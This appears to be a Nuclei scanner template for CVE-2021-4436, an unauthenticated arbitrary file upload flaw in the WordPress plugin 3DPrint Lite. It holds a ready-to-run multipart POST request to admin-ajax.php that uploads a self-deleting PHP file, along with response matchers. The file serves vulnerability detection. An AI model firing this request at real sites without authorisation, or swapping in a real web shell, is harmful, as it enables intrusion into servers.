nuclei-templates/http/cves/2021/CVE-2021-4436.yaml

66 lines
2.4 KiB
YAML
Raw Normal View History

2024-06-24 13:55:44 +00:00
id: CVE-2021-4436
info:
name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
author: securityforeveryone
severity: critical
description: |
The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
remediation: Fixed in 1.9.1.5
reference:
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
- https://nvd.nist.gov/vuln/detail/CVE-2021-4436
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-4436
cwe-id: CWE-434
epss-score: 0.00412
epss-percentile: 0.73863
cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
metadata:
2024-06-24 17:10:57 +00:00
verified: true
max-request: 1
2024-06-24 13:55:44 +00:00
vendor: wp3dprinting
product: 3dprint_lite
framework: wordpress
2024-06-24 17:10:57 +00:00
publicwww-query: "/wp-content/plugins/3dprint-lite/"
tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive
variables:
string: "{{randstr}}"
filename: "{{to_lower(rand_text_alpha(5))}}"
2024-06-24 13:55:44 +00:00
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"
p3dlite_handle_upload
-----------------------------54331109111293931601238262353
2024-06-24 17:10:57 +00:00
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
2024-06-24 13:55:44 +00:00
Content-Type: text/php
2024-06-24 17:10:57 +00:00
<?php echo "{{string}}";unlink(__FILE__);?>
2024-06-24 13:55:44 +00:00
-----------------------------54331109111293931601238262353--
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"jsonrpc":"2.0"'
2024-06-24 17:10:57 +00:00
- '"filename":'
- '{{filename}}.php'
2024-06-24 13:55:44 +00:00
condition: and
2024-06-24 14:17:21 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450220505cc213149b2b7ea3611ef5cd0bf0c1d786d34503427cfdbd6ccc0844710e430221008083729a34767882c976fc061ae7a9a6db2061f3de0036ea1c4da8ec263724cf:922c64590222798bb761d5b6d8e72950